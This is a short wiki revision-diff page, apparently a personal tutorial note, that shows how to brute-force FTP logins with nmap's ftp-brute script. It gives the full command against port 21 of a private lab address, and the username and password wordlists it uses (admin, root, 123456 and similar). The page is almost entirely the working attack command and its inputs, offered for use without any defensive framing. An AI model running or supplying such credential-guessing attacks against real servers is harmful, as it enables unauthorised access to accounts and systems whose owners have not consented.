Difference between revisions of "Nmap: brute force hack ftp password"

From OnnoWiki
Jump to navigation Jump to search
(Created page with " nmap -p21 –script ftp-brute.nse –script-args userdb=/root/Desktop/user.txt,passdb=/root/Desktop/pass.txt 192.168.1.105")
 
Line 1: Line 1:
  
  
  nmap -p21 –script ftp-brute.nse –script-args
+
isi
   userdb=/root/Desktop/user.txt,passdb=/root/Desktop/pass.txt 192.168.1.105
+
 
 +
user.txt
 +
 
 +
admin
 +
root
 +
onno
 +
dll
 +
 
 +
isi
 +
 
 +
pass.txt
 +
 
 +
123456789
 +
123456
 +
12345
 +
dll
 +
 
 +
  nmap -p21 –script ftp-brute.nse –script-args \
 +
   userdb=/root/user.txt,passdb=/root/pass.txt 192.168.1.105

Revision as of 10:50, 1 June 2018


isi

user.txt
admin
root
onno
dll

isi

pass.txt
123456789
123456
12345
dll
nmap -p21 –script ftp-brute.nse –script-args \
  userdb=/root/user.txt,passdb=/root/pass.txt 192.168.1.105